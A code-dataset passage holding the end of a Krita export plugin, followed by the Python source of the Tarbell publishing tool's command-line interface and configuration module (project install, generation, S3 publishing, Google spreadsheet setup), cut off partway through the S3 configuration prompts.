self.set_layer('bg', True, nodes)
child.setVisible(True)
doc.refreshProjection()
filename = base_folder + '/' + project_folder + ('/' + base_name)*2 + "_" + str(child.name()) + format
print("Saving: " + filename)
doc.saveAs(filename)
for i in range(len(nodes)):
nodes[i].setVisible(original_v[i])
doc.refreshProjection()
doc.save()
doc.setBatchmode(False)
Krita.instance().addDockWidgetFactory(DockWidgetFactory("material_exporter", DockWidgetFactoryBase.DockRight, MaterialExporterDocker))
```
|
{
"source": "j-e-d/tarbell",
"score": 2
}
|
#### File: tarbell/tarbell/cli.py
```python
import codecs
import glob
import imp
import jinja2
import os
import pkg_resources
import sh
import shutil
import socket
import sys
import tempfile
import webbrowser
# Import readline without breaking process backgrounding on some OS X versions
# See https://github.com/tarbell-project/tarbell/issues/291
import signal
signal.signal(signal.SIGTTOU, signal.SIG_IGN)
import gnureadline
from apiclient import errors
from apiclient.http import MediaFileUpload as _MediaFileUpload
from clint import arguments
from clint.textui import colored
from six.moves import input as raw_input
from tarbell import __VERSION__ as VERSION
MAJOR_VERSION = '.'.join(VERSION.split('.')[:2])
# Handle relative imports from binary, see https://github.com/newsapps/flask-tarbell/issues/87
if __name__ == "__main__" and __package__ is None:
__package__ = "tarbell.cli"
from .app import process_xlsx, copy_global_values
from .template import pprint_lines
from .oauth import get_drive_api
from .contextmanagers import ensure_settings, ensure_project
from .configure import tarbell_configure
from .s3 import S3Url, S3Sync
from .settings import Settings
from .utils import list_get, split_sentences, show_error
from .utils import puts, is_werkzeug_process
# Set args
args = arguments.Args()
# --------
# Dispatch
# --------
def main():
"""
Primary Tarbell command dispatch.
"""
command = Command.lookup(args.get(0))
if len(args) == 0 or args.contains(('-h', '--help', 'help')):
display_info(args)
sys.exit(1)
elif args.contains(('-v', '--version')):
display_version()
sys.exit(1)
elif command:
arg = args.get(0)
args.remove(arg)
command.__call__(command, args)
sys.exit()
else:
show_error(colored.red('Error! Unknown command \'{0}\'.\n'
.format(args.get(0))))
display_info(args)
sys.exit(1)
def display_info(args):
"""
Displays Tarbell info.
"""
puts('\nTarbell: Simple web publishing\n')
puts('Usage: {0}\n'.format(colored.cyan('tarbell <command>')))
puts('Commands:\n')
for command in Command.all_commands():
usage = command.usage or command.name
help = command.help or ''
puts('{0} {1}'.format(
colored.yellow('{0: <37}'.format(usage)),
split_sentences(help, 37)
))
puts("")
settings = Settings()
if settings.file_missing:
puts('---\n{0}: {1}'.format(
colored.red("Warning"),
"No Tarbell configuration found. Run:"
))
puts('\n{0}'.format(
colored.green("tarbell configure")
))
puts('\n{0}\n---'.format(
"to configure Tarbell."
))
def display_version():
"""
Displays Tarbell version/release.
"""
puts('You are using Tarbell v{0}'.format(
colored.green(VERSION)
))
def tarbell_generate(command, args, skip_args=False, extra_context=None, quiet=False):
"""
Generate static files.
"""
output_root = None
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
if not skip_args:
output_root = list_get(args, 0, False)
if output_root:
is_folder = os.path.exists(output_root)
else:
puts("\nYou must specify an output directory (e.g. `{0}`)".format(
colored.cyan("tarbell generate _out")
))
sys.exit()
if quiet:
site.quiet = True
if not output_root:
output_root = tempfile.mkdtemp(prefix="{0}-".format(site.project.__name__))
is_folder = False
if args.contains('--context'):
site.project.CONTEXT_SOURCE_FILE = args.value_after('--context')
if args.contains('--overwrite'):
is_folder = False
        # check to see if the folder we're trying to create already exists
if is_folder:
output_file = raw_input(("\nA folder named {0} already exists! Do you want to delete it? (selecting 'N' will quit) [y/N] ").format(
output_root
))
if output_file and output_file.lower() == "y":
puts(("\nDeleting {0}...\n").format(
colored.cyan(output_root)
))
_delete_dir(output_root)
else:
puts("\nNot overwriting. See ya!")
sys.exit()
site.generate_static_site(output_root, extra_context)
if not quiet:
puts("\nCreated site in {0}".format(colored.cyan(output_root)))
return output_root
def tarbell_install(command, args):
"""
Install a project.
"""
with ensure_settings(command, args) as settings:
project_url = args.get(0)
puts("\n- Getting project information for {0}".format(project_url))
project_name = project_url.split("/").pop()
error = None
# Create a tempdir and clone
tempdir = tempfile.mkdtemp()
try:
testgit = sh.git.bake(_cwd=tempdir, _tty_in=True, _tty_out=False) # _err_to_out=True)
testclone = testgit.clone(project_url, '.', '--depth=1', '--bare')
puts(testclone)
config = testgit.show("HEAD:tarbell_config.py")
puts("\n- Found tarbell_config.py")
path = _get_path(_clean_suffix(project_name, ".git"), settings)
_mkdir(path)
git = sh.git.bake(_cwd=path)
clone = git.clone(project_url, '.', _tty_in=True, _tty_out=False, _err_to_out=True)
puts(clone)
puts(git.submodule.update('--init', '--recursive', _tty_in=True, _tty_out=False, _err_to_out=True))
_install_requirements(path)
# Get site, run hook
with ensure_project(command, args, path) as site:
site.call_hook("install", site, git)
except sh.ErrorReturnCode_128 as e:
            if 'Device not configured' in str(e):  # sh errors have no .message on Python 3
error = 'Git tried to prompt for a username or password.\n\nTarbell doesn\'t support interactive sessions. Please configure ssh key access to your Git repository. (See https://help.github.com/articles/generating-ssh-keys/)'
else:
error = 'Not a valid repository or Tarbell project'
finally:
_delete_dir(tempdir)
if error:
show_error(error)
else:
puts("\n- Done installing project in {0}".format(colored.yellow(path)))
def tarbell_install_blueprint(command, args):
"""
Install a project template.
"""
with ensure_settings(command, args) as settings:
name = None
error = None
template_url = args.get(0)
matches = [template for template in settings.config["project_templates"] if template.get("url") == template_url]
tempdir = tempfile.mkdtemp()
if matches:
puts("\n{0} already exists. Nothing more to do.\n".format(
colored.yellow(template_url)
))
sys.exit()
try:
puts("\nInstalling {0}".format(colored.cyan(template_url)))
puts("\n- Cloning repo")
git = sh.git.bake(_cwd=tempdir, _tty_in=True, _tty_out=False, _err_to_out=True)
puts(git.clone(template_url, '.'))
_install_requirements(tempdir)
filename, pathname, description = imp.find_module('blueprint', [tempdir])
blueprint = imp.load_module('blueprint', filename, pathname, description)
puts("\n- Found _blueprint/blueprint.py")
name = blueprint.NAME
puts("\n- Name specified in blueprint.py: {0}".format(colored.yellow(name)))
settings.config["project_templates"].append({"name": name, "url": template_url})
settings.save()
except AttributeError:
name = template_url.split("/")[-1]
error = "\n- No name specified in blueprint.py, using '{0}'".format(colored.yellow(name))
except ImportError:
error = 'No blueprint.py found'
except sh.ErrorReturnCode_128 as e:
            if 'Device not configured' in str(e):  # e.stdout is bytes on Python 3
error = 'Git tried to prompt for a username or password.\n\nTarbell doesn\'t support interactive sessions. Please configure ssh key access to your Git repository. (See https://help.github.com/articles/generating-ssh-keys/)'
else:
error = 'Not a valid repository or Tarbell project'
finally:
_delete_dir(tempdir)
if error:
show_error(error)
else:
puts("\n+ Added new project template: {0}".format(colored.yellow(name)))
def tarbell_list(command, args):
"""
List tarbell projects.
"""
with ensure_settings(command, args) as settings:
projects_path = settings.config.get("projects_path")
if not projects_path:
show_error("{0} does not exist".format(projects_path))
sys.exit()
puts("Listing projects in {0}\n".format(
colored.yellow(projects_path)
))
longest_title = 0
projects = []
for directory in os.listdir(projects_path):
project_path = os.path.join(projects_path, directory)
try:
filename, pathname, description = imp.find_module('tarbell_config', [project_path])
config = imp.load_module(directory, filename, pathname, description)
title = config.DEFAULT_CONTEXT.get("title", directory)
projects.append((directory, title))
if len(title) > longest_title:
longest_title = len(title)
except ImportError:
pass
if len(projects):
fmt = "{0: <"+str(longest_title+1)+"} {1}"
puts(fmt.format(
'title',
'project name'
))
for projectname, title in projects:
title = codecs.encode(title, 'utf8')
puts(colored.yellow(fmt.format(
title,
colored.cyan(projectname)
)))
puts("\nUse {0} to switch to a project".format(
colored.green("tarbell switch <project name>")
))
else:
puts("No projects found")
def tarbell_list_templates(command, args):
"""
List available Tarbell blueprints.
"""
with ensure_settings(command, args) as settings:
puts("\nAvailable project templates\n")
_list_templates(settings)
puts("")
def tarbell_publish(command, args):
"""
Publish to s3.
"""
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
bucket_name = list_get(args, 0, "staging")
try:
bucket_url = S3Url(site.project.S3_BUCKETS[bucket_name])
except KeyError:
show_error(
"\nThere's no bucket configuration called '{0}' in "
"tarbell_config.py.".format(colored.yellow(bucket_name)))
sys.exit(1)
extra_context = {
"ROOT_URL": bucket_url,
"S3_BUCKET": bucket_url.root,
"BUCKET_NAME": bucket_name,
}
tempdir = "{0}/".format(tarbell_generate(command,
args, extra_context=extra_context, skip_args=True, quiet=True))
try:
title = site.project.DEFAULT_CONTEXT.get("title", "")
puts("\nDeploying {0} to {1} ({2})\n".format(
colored.yellow(title),
colored.red(bucket_name),
colored.green(bucket_url)
))
# Get creds
if settings.config:
# If settings has a config section, use it
kwargs = settings.config['s3_credentials'].get(bucket_url.root)
if not kwargs:
kwargs = {
'access_key_id': settings.config.get('default_s3_access_key_id'),
'secret_access_key': settings.config.get('default_s3_secret_access_key'),
}
puts("Using default bucket credentials")
else:
puts("Using custom bucket configuration for {0}".format(bucket_url.root))
else:
# If no configuration exists, read from environment variables if possible
puts("Attemping to use AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY")
kwargs = {
'access_key_id': os.environ["AWS_ACCESS_KEY_ID"],
'secret_access_key': os.environ["AWS_SECRET_ACCESS_KEY"],
}
if not kwargs.get('access_key_id') and not kwargs.get('secret_access_key'):
show_error('S3 access is not configured. Set up S3 with {0} to publish.'
.format(colored.green('tarbell configure')))
sys.exit()
s3 = S3Sync(tempdir, bucket_url, **kwargs)
s3.deploy_to_s3()
site.call_hook("publish", site, s3)
puts("\nIf you have website hosting enabled, you can see your project at:")
puts(colored.green("http://{0}\n".format(bucket_url)))
except KeyboardInterrupt:
show_error("ctrl-c pressed, bailing out!")
finally:
_delete_dir(tempdir)
def tarbell_newproject(command, args):
"""
Create new Tarbell project.
"""
with ensure_settings(command, args) as settings:
# Set it up and make the directory
name = _get_project_name(args)
puts("Creating {0}".format(colored.cyan(name)))
path = _get_path(name, settings)
_mkdir(path)
try:
_newproject(command, path, name, settings)
except KeyboardInterrupt:
_delete_dir(path)
show_error("ctrl-c pressed, not creating new project.")
except:
_delete_dir(path)
show_error("Unexpected error: {0}".format(sys.exc_info()[0]))
raise
def tarbell_serve(command, args):
"""
Serve the current Tarbell project.
"""
with ensure_project(command, args) as site:
with ensure_settings(command, args) as settings:
address = list_get(args, 0, "").split(":")
ip = list_get(address, 0, settings.config['default_server_ip'])
port = int(list_get(address, 1, settings.config['default_server_port']))
puts("\n * Running local server. Press {0} to stop the server".format(colored.red("ctrl-c")))
puts(" * Edit this project's templates at {0}".format(colored.yellow(site.path)))
try:
if not is_werkzeug_process():
site.call_hook("server_start", site)
site.app.run(ip, port=port)
if not is_werkzeug_process():
site.call_hook("server_stop", site)
except socket.error:
show_error("Address {0} is already in use, please try another port or address."
.format(colored.yellow("{0}:{1}".format(ip, port))))
def tarbell_switch(command, args):
"""
Switch to a project.
"""
with ensure_settings(command, args) as settings:
projects_path = settings.config.get("projects_path")
if not projects_path:
show_error("{0} does not exist".format(projects_path))
sys.exit()
project = args.get(0)
args.remove(project)
project_path = os.path.join(projects_path, project)
if os.path.isdir(project_path):
os.chdir(project_path)
puts("\nSwitching to {0}".format(colored.red(project)))
tarbell_serve(command, args)
else:
show_error("{0} isn't a tarbell project".format(project_path))
def tarbell_credentials(command, args):
"""
Print current OAuth access token.
"""
api = get_drive_api()
puts(api.credentials.to_json())
def tarbell_update(command, args):
"""
Update the current tarbell project.
"""
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
puts("Updating to latest blueprint\n")
git = sh.git.bake(_cwd=site.base.base_dir)
# stash then pull
puts(colored.yellow("Stashing local changes"))
puts(git.stash())
puts(colored.yellow("Pull latest changes"))
puts(git.pull())
# need to pop any local changes back to get back on the original branch
# this may behave oddly if you have old changes stashed
if git.stash.list():
puts(git.stash.pop())
def tarbell_unpublish(command, args):
"""
Delete a project.
"""
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
show_error("Not implemented!")
def tarbell_spreadsheet(command, args):
"""
Open context spreadsheet
"""
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
try:
# First, try to get the Google Spreadsheet URL
spreadsheet_url = _google_spreadsheet_url(site.project.SPREADSHEET_KEY)
except AttributeError:
# The project doesn't seem to be using a Google Spreadsheet.
# Try the URL or path specified in the CONTEXT_SOURCE_FILE setting
try:
spreadsheet_url = _context_source_file_url(
site.project.CONTEXT_SOURCE_FILE)
print(spreadsheet_url)
except AttributeError:
puts(colored.red("No Google spreadsheet or context source file "
"has been configured.\n"))
return
# Use the webbrowser package to try to open the file whether it's a
# remote URL on the web, or a local file. On some platforms it will
# successfully open local files in the default application.
# This seems preferable to trying to do os detection and calling
# the system-specific command for opening files in default
# applications.
# See
# http://stackoverflow.com/questions/434597/open-document-with-default-application-in-python
webbrowser.open(spreadsheet_url)
def _google_spreadsheet_url(key):
"""
Returns full editing URL for a Google Spreadsheet given its key
"""
return "https://docs.google.com/spreadsheets/d/{key}/edit".format(key=key)
def _context_source_file_url(path_or_url):
"""
Returns a URL for a remote or local context CSV file
"""
if path_or_url.startswith('http'):
# Remote CSV. Just return the URL
return path_or_url
if path_or_url.startswith('/'):
# Absolute path
return "file://" + path_or_url
return "file://" + os.path.join(os.path.realpath(os.getcwd()), path_or_url)
def _newproject(command, path, name, settings):
"""
Helper to create new project.
"""
key = None
title = _get_project_title()
template = _get_template(settings)
# Init repo
git = sh.git.bake(_cwd=path)
puts(git.init())
if template.get("url"):
# Create submodule
puts(git.submodule.add(template['url'], '_blueprint'))
puts(git.submodule.update(*['--init']))
# Create spreadsheet
key = _create_spreadsheet(name, title, path, settings)
# Copy html files
puts(colored.green("\nCopying html files..."))
files = glob.iglob(os.path.join(path, "_blueprint", "*.html"))
for file in files:
if os.path.isfile(file):
dir, filename = os.path.split(file)
if not filename.startswith("_") and not filename.startswith("."):
puts("Copying {0} to {1}".format(filename, path))
shutil.copy2(file, path)
ignore = os.path.join(path, "_blueprint", ".gitignore")
if os.path.isfile(ignore):
shutil.copy2(ignore, path)
else:
empty_index_path = os.path.join(path, "index.html")
open(empty_index_path, "w")
# Create config file
_copy_config_template(name, title, template, path, key, settings)
# Commit
puts(colored.green("\nInitial commit"))
puts(git.add('.'))
puts(git.commit(m='Created {0} from {1}'.format(name, template['name'])))
_install_requirements(path)
# Get site, run hook
with ensure_project(command, args, path) as site:
site.call_hook("newproject", site, git)
# Messages
puts("\nAll done! To preview your new project, type:\n")
puts("{0} {1}".format(colored.green("tarbell switch"), colored.green(name)))
puts("\nor\n")
puts("{0}".format(colored.green("cd %s" % path)))
puts("{0}".format(colored.green("tarbell serve\n")))
puts("\nYou got this!\n")
def _install_requirements(path):
"""
Install a blueprint's requirements.txt
"""
locations = [os.path.join(path, "_blueprint"), os.path.join(path, "_base"), path]
success = True
for location in locations:
try:
with open(os.path.join(location, "requirements.txt")):
puts("\nRequirements file found at {0}".format(os.path.join(location, "requirements.txt")))
install_reqs = raw_input("Install requirements now with pip install -r requirements.txt? [Y/n] ")
if not install_reqs or install_reqs.lower() == 'y':
pip = sh.pip.bake(_cwd=location)
puts("\nInstalling requirements...")
puts(pip("install", "-r", "requirements.txt"))
else:
success = False
puts("Not installing requirements. This may break everything! Vaya con dios.")
except IOError:
pass
return success
def _get_project_name(args):
"""
Get project name.
"""
name = args.get(0)
puts("")
while not name:
name = raw_input("What is the project's short directory name? (e.g. my_project) ")
return name
def _get_project_title():
"""
Get project title.
"""
title = None
puts("")
while not title:
title = raw_input("What is the project's full title? (e.g. My awesome project) ")
return title
def _clean_suffix(string, suffix):
"""
If string endswith the suffix, remove it. Else leave it alone.
"""
suffix_len = len(suffix)
if len(string) < suffix_len:
# the string param was shorter than the suffix
        raise ValueError("A suffix cannot be longer than the string argument.")
if string.endswith(suffix):
# return from the beginning up to
# but not including the first letter
# in the suffix
return string[0:-suffix_len]
else:
# leave unharmed
return string
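# Worked examples (illustrative only):
#   _clean_suffix("myproject.git", ".git") -> "myproject"
#   _clean_suffix("myproject.zip", ".git") -> "myproject.zip"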
def _get_path(name, settings, mkdir=True):
"""
Generate a project path.
"""
default_projects_path = settings.config.get("projects_path")
path = None
if default_projects_path:
path = raw_input("\nWhere would you like to create this project? [{0}/{1}] ".format(default_projects_path, name))
if not path:
path = os.path.join(default_projects_path, name)
else:
while not path:
path = raw_input("\nWhere would you like to create this project? (e.g. ~/tarbell/) ")
return os.path.expanduser(path)
def _mkdir(path):
"""
Make a directory or bail.
"""
try:
os.mkdir(path)
except OSError as e:
if e.errno == 17:
show_error("ABORTING: Directory {0} already exists.".format(path))
else:
show_error("ABORTING: OSError {0}".format(e))
sys.exit()
def _get_template(settings):
"""
Prompt user to pick template from a list.
"""
puts("\nPick a template\n")
template = None
while not template:
_list_templates(settings)
index = raw_input("\nWhich template would you like to use? [1] ")
if not index:
index = "1"
try:
index = int(index) - 1
return settings.config["project_templates"][index]
except:
puts("\"{0}\" isn't a valid option!".format(colored.red("{0}".format(index))))
pass
def _list_templates(settings):
"""
List templates from settings.
"""
for idx, option in enumerate(settings.config.get("project_templates"), start=1):
puts(" {0!s:5} {1!s:36}".format(
colored.yellow("[{0}]".format(idx)),
colored.cyan(option.get("name"))
))
if option.get("url"):
puts(" {0}\n".format(option.get("url")))
def _create_spreadsheet(name, title, path, settings):
"""
Create Google spreadsheet.
"""
if not settings.client_secrets:
return None
create = raw_input("Would you like to create a Google spreadsheet? [Y/n] ")
if create and not create.lower() == "y":
return puts("Not creating spreadsheet.")
email_message = (
"What Google account(s) should have access to this "
"this spreadsheet? (Use a full email address, such as "
"<EMAIL>. Separate multiple addresses with commas.)")
if settings.config.get("google_account"):
emails = raw_input("\n{0}(Default: {1}) ".format(email_message,
settings.config.get("google_account")
))
if not emails:
emails = settings.config.get("google_account")
else:
emails = None
while not emails:
emails = raw_input(email_message)
try:
media_body = _MediaFileUpload(os.path.join(path, '_blueprint/_spreadsheet.xlsx'),
mimetype='application/vnd.ms-excel')
except IOError:
show_error("_blueprint/_spreadsheet.xlsx doesn't exist!")
return None
service = get_drive_api()
body = {
'title': '{0} (Tarbell)'.format(title),
'description': '{0} ({1})'.format(title, name),
'mimeType': 'application/vnd.ms-excel',
}
try:
newfile = service.files()\
.insert(body=body, media_body=media_body, convert=True).execute()
for email in emails.split(","):
_add_user_to_file(newfile['id'], service, user_email=email.strip())
puts("\n{0!s}! View the spreadsheet at {1!s}".format(
colored.green("Success"),
colored.yellow("https://docs.google.com/spreadsheet/ccc?key={0}"
.format(newfile['id']))
))
return newfile['id']
except errors.HttpError as error:
show_error('An error occurred creating spreadsheet: {0}'.format(error))
return None
def _add_user_to_file(file_id, service, user_email,
perm_type='user', role='writer'):
"""
Grants the given set of permissions for a given file_id. service is an
already-credentialed Google Drive service instance.
"""
new_permission = {
'value': user_email,
'type': perm_type,
'role': role
}
try:
service.permissions()\
.insert(fileId=file_id, body=new_permission)\
.execute()
except errors.HttpError as error:
show_error('An error adding users to spreadsheet: {0}'.format(error))
def _copy_config_template(name, title, template, path, key, settings):
"""
Get and render tarbell_config.py.template from Tarbell default.
"""
puts("\nCopying configuration file")
context = settings.config
context.update({
"default_context": {
"name": name,
"title": title,
},
"name": name,
"title": title,
"template_repo_url": template.get('url'),
"key": key,
})
# @TODO refactor this a bit
if not key:
spreadsheet_path = os.path.join(path, '_blueprint/', '_spreadsheet.xlsx')
try:
with open(spreadsheet_path, "rb") as f:
puts("Copying _blueprint/_spreadsheet.xlsx to tarbell_config.py's DEFAULT_CONTEXT")
data = process_xlsx(f.read())
if 'values' in data:
data = copy_global_values(data)
context["default_context"].update(data)
except IOError:
pass
s3_buckets = settings.config.get("s3_buckets")
if s3_buckets:
puts("")
for bucket, bucket_conf in s3_buckets.items():
puts("Configuring {0!s} bucket at {1!s}\n".format(
colored.green(bucket),
colored.yellow("{0}/{1}".format(bucket_conf['uri'], name))
))
puts("\n- Creating {0!s} project configuration file".format(
colored.cyan("tarbell_config.py")
))
template_dir = os.path.dirname(pkg_resources.resource_filename("tarbell", "templates/tarbell_config.py.template"))
loader = jinja2.FileSystemLoader(template_dir)
env = jinja2.Environment(loader=loader)
env.filters["pprint_lines"] = pprint_lines # For dumping context
content = env.get_template('tarbell_config.py.template').render(context)
codecs.open(os.path.join(path, "tarbell_config.py"), "w", encoding="utf-8").write(content)
puts("\n- Done copying configuration file")
def _delete_dir(dir):
"""
Delete a directory.
"""
try:
shutil.rmtree(dir) # delete directory
except OSError as exc:
if exc.errno != 2: # code 2 - no such file or directory
raise # re-raise exception
except UnboundLocalError:
pass
class Command(object):
"""
Class that encapsulates a tarbell command.
"""
COMMANDS = {}
SHORT_MAP = {}
@classmethod
def register(klass, command):
klass.COMMANDS[command.name] = command
if command.short:
for short in command.short:
klass.SHORT_MAP[short] = command
@classmethod
def lookup(klass, name):
if name in klass.SHORT_MAP:
return klass.SHORT_MAP[name]
if name in klass.COMMANDS:
return klass.COMMANDS[name]
else:
return None
@classmethod
def all_commands(klass):
return sorted(klass.COMMANDS.values(),
key=lambda cmd: cmd.name)
def __init__(self, name=None, short=None, fn=None, usage=None, help=None):
self.name = name
self.short = short
self.fn = fn
self.usage = usage
self.help = help
def __call__(self, *args, **kw_args):
return self.fn(*args, **kw_args)
def def_cmd(name=None, short=None, fn=None, usage=None, help=None):
"""
Define a command.
"""
command = Command(name=name, short=short, fn=fn, usage=usage, help=help)
Command.register(command)
# Note that the tarbell_configure function is imported from contextmanagers.py
def_cmd(
name='configure',
fn=tarbell_configure,
usage='configure <subcommand (optional)>',
help="Configure Tarbell. Subcommand can be one of 'drive', 's3', 'path', or 'templates'.")
def_cmd(
name='generate',
fn=tarbell_generate,
usage='generate <output dir>',
help=('Generate static files for the current project. If no output '
'directory specified, Tarbell will raise an error asking for one.'))
def_cmd(
name='install',
fn=tarbell_install,
usage='install <url to project repository>',
help='Install a pre-existing project')
def_cmd(
name='install-blueprint',
fn=tarbell_install_blueprint,
usage='install-blueprint <url to blueprint>',
help='Install a Tarbell blueprint')
def_cmd(
name='install-template',
fn=tarbell_install_blueprint,
usage='install-template <url to blueprint>',
help='Install a Tarbell blueprint (deprecated, use \'tarbell install-blueprint\')')
def_cmd(
name='list',
fn=tarbell_list,
usage='list',
help='List all projects.')
def_cmd(
name='list-templates',
fn=tarbell_list_templates,
usage='list-templates',
help='List installed project templates')
def_cmd(
name='publish',
fn=tarbell_publish,
usage='publish <target (default: staging)>',
help='Publish the current project to <target>.')
def_cmd(
name='newproject',
fn=tarbell_newproject,
usage='newproject <project>',
help='Create a new project named <project>')
def_cmd(
name='serve',
fn=tarbell_serve,
usage='serve <address (optional)>',
help=('Run a preview server (typically handled by \'switch\'). '
'Supply an optional address for the preview server such as '
'\'192.168.56.1:8080\''))
def_cmd(
name='switch',
fn=tarbell_switch,
usage='switch <project> <address (optional)>',
help=('Switch to the project named <project> and start a preview server. '
'Supply an optional address for the preview server such as '
'\'192.168.56.1:8080\''))
def_cmd(
name='credentials',
fn=tarbell_credentials,
usage='credentials',
help=('Display Google OAuth credentials'))
def_cmd(
name='update',
fn=tarbell_update,
usage='update',
help='Update blueprint in current project.')
def_cmd(
name='unpublish',
fn=tarbell_unpublish,
usage='unpublish <target (default: staging)>',
help='Remove the current project from <target>.')
def_cmd(
name='spreadsheet',
fn=tarbell_spreadsheet,
usage='spreadsheet',
help='Open context spreadsheet in your browser or default application')
```
#### File: tarbell/tarbell/configure.py
```python
import os
import sys
import yaml
import shutil
from subprocess import call
from datetime import datetime
from clint.textui import colored, puts
from six.moves import input as raw_input
from tarbell import LONG_VERSION
from .settings import Settings
from .oauth import get_drive_api_from_client_secrets
from .utils import show_error
def tarbell_configure(command, args):
"""
Tarbell configuration routine.
"""
puts("Configuring Tarbell. Press ctrl-c to bail out!")
# Check if there's settings configured
settings = Settings()
path = settings.path
prompt = True
if len(args):
prompt = False
config = _get_or_create_config(path)
if prompt or "drive" in args:
config.update(_setup_google_spreadsheets(config, path, prompt))
if prompt or "s3" in args:
config.update(_setup_s3(config, path, prompt))
if prompt or "path" in args:
config.update(_setup_tarbell_project_path(config, path, prompt))
if prompt or "templates" in args:
if "project_templates" in config:
            override_templates = raw_input("\nFound Base Template config. Would you like to override them? [Default: No, 'none' to skip] ")
            if override_templates and override_templates.lower() not in ("no", "n"):
config.update(_setup_default_templates(config, path, prompt))
else:
puts("\nPreserving Base Template config...")
else:
config.update(_setup_default_templates(config, path, prompt))
settings.config = config
with open(path, 'w') as f:
puts("\nWriting {0}".format(colored.green(path)))
settings.save()
    puts("\n- Done configuring Tarbell. Type `{0}` for help.\n"
         .format(colored.green("tarbell")))
return settings
def _get_or_create_config(path, prompt=True):
"""
Get or create a Tarbell configuration directory.
"""
dirname = os.path.dirname(path)
filename = os.path.basename(path)
try:
os.makedirs(dirname)
except OSError:
pass
try:
with open(path, 'r+') as f:
if os.path.isfile(path):
puts("{0} already exists, backing up".format(colored.green(path)))
_backup(dirname, filename)
            return yaml.safe_load(f)  # safe_load: config files need no arbitrary-object support
except IOError:
return {}
def _setup_google_spreadsheets(settings, path, prompt=True):
"""
    Set up Google spreadsheet access.
"""
ret = {}
if prompt:
use = raw_input("\nWould you like to use Google spreadsheets [Y/n]? ")
if use.lower() != "y" and use != "":
return settings
dirname = os.path.dirname(path)
path = os.path.join(dirname, "client_secrets.json")
write_secrets = True
if os.path.isfile(path):
write_secrets_input = raw_input("client_secrets.json already exists. Would you like to overwrite it? [y/N] ")
if not write_secrets_input.lower().startswith('y'):
write_secrets = False
if write_secrets:
puts(("\nLogin in to Google and go to {0} to create an app and generate a "
"\nclient_secrets authentication file. You should create credentials for an `installed app`. See "
"\n{1} for more information."
.format(colored.red("https://console.developers.google.com/project"),
colored.red("http://tarbell.readthedocs.org/en/{0}/install.html#configure-google-spreadsheet-access-optional".format(LONG_VERSION))
)
))
secrets_path = raw_input(("\nWhere is your client secrets file? "
"[~/Downloads/client_secrets.json] "
))
if secrets_path == "":
secrets_path = os.path.join("~", "Downloads/client_secrets.json")
secrets_path = os.path.expanduser(secrets_path)
puts("\nCopying {0} to {1}\n"
.format(colored.green(secrets_path),
colored.green(dirname))
)
_backup(dirname, "client_secrets.json")
try:
shutil.copy(secrets_path, os.path.join(dirname, 'client_secrets.json'))
except shutil.Error as e:
show_error(str(e))
# Now, try and obtain the API for the first time
get_api = raw_input("Would you like to authenticate your client_secrets.json? [Y/n] ")
if get_api == '' or get_api.lower().startswith('y'):
get_drive_api_from_client_secrets(path, reset_creds=True)
default_account = settings.get("google_account", "")
account = raw_input(("What Google account(s) should have access to new spreadsheets? "
"(e.g. <EMAIL>, leave blank to specify for each new "
"project, separate multiple addresses with commas) [{0}] "
.format(default_account)
))
if default_account != "" and account == "":
account = default_account
if account != "":
ret = { "google_account" : account }
puts("\n- Done configuring Google spreadsheets.")
return ret
def _setup_s3(settings, path, prompt=True):
"""
Prompt user to set up Amazon S3.
"""
ret = {'default_s3_buckets': {}, 's3_credentials': settings.get('s3_credentials', {})}
if prompt:
use = raw_input("\nWould you like to set up Amazon S3? [Y/n] ")
if use.lower() != "y" and use != "":
puts("\n- Not configuring Amazon S3.")
return ret
existing_access_key = settings.get('default_s3_access_key_id', None) or \
os.environ.get('AWS_ACCESS_KEY_ID', None)
existing_secret_key = settings.get('default_s3_secret_access_key', None) or \
os.environ.get('AWS_SECRET_ACCESS_KEY', None)
access_key_prompt = "\nPlease enter your default Amazon Access Key ID:"
if existing_access_key:
access_key_prompt += ' [%s] ' % existing_access_key
else:
access_key_prompt += ' (leave blank to skip) '
default_aws_access_key_id = raw_input(access_key_prompt)
if default_aws_access_key_id == '' and existing_access_key:
default_aws_access_key_id = existing_access_key
if default_aws_access_key_id:
secret_key_prompt = "\nPlease enter your default Amazon Secret Access Key:"
if existing_secret_key:
secret_key_prompt += ' [%s] ' % existing_secret_key
else:
secret_key_prompt += ' (leave blank to skip) '
default_aws_secret_access_key = raw_input(secret_key_prompt)
if default_aws_secret_access_key == '' and existing_secret_key:
default_aws_secret_access_key = existing_secret_key
ret.update({
'default_s3_access_key_id': default_aws_access_key_id,
'default_s3_secret_access_key': default_aws_secret_access_key,
})
# If we're all set with AWS creds, we can setup our default
# staging and production buckets
if default_aws_access_key_id and default_aws_secret_access_key:
existing_staging_bucket = None
existing_production_bucket = None
if settings.get('default_s3_buckets'):
existing_staging_bucket = settings['default_s3_buckets'].get('staging', None)
existing_production_bucket = settings['default_s3_buckets'].get('production', None)
staging_prompt = "\nWhat is your default staging bucket?"
if existing_staging_bucket:
staging_prompt += ' [%s] ' % existing_staging_bucket
else:
staging_prompt += ' (e.g. apps.beta.myorg.com, leave blank to skip) '
staging = raw_input(staging_prompt)
if staging == '' and existing_staging_bucket:
staging = existing_staging_bucket
if staging != "":
ret['default_s3_buckets'].update({
'staging': staging,
})
production_prompt = "\nWhat is your default production bucket?"
if existing_production_bucket:
production_prompt += ' [%s] ' % existing_production_bucket
else:
production_prompt += ' (e.g. apps.myorg.com, leave blank to skip) '
production = raw_input(production_prompt)
if production == '' and existing_production_bucket:
production = existing_production_bucket
if production != "":
ret['default_s3_buckets'].update({
'production': production,
})
more_prompt = "\nWould you like to add additional buckets and credentials? [y/N] "
while raw_input(more_prompt).lower() == 'y':
## Ask for a uri
additional_s3_bucket = raw_input(
"\nPlease specify an additional bucket (e.g. "
"additional.bucket.myorg.com/, leave blank to skip adding bucket) ")
if additional_s3_bucket == "":
continue
## Ask for an access key, if it differs from the default
additional_access_key_prompt = "\nPlease specify an AWS Access Key ID for this bucket:"
if default_aws_access_key_id:
additional_access_key_prompt += ' [%s] ' % default_aws_access_key_id
else:
additional_access_key_prompt += ' (leave blank to skip adding bucket) '
additional_aws_access_key_id = raw_input(additional_access_key_prompt)
if additional_aws_access_key_id == "" and default_aws_access_key_id:
additional_aws_access_key_id = default_aws_access_key_id
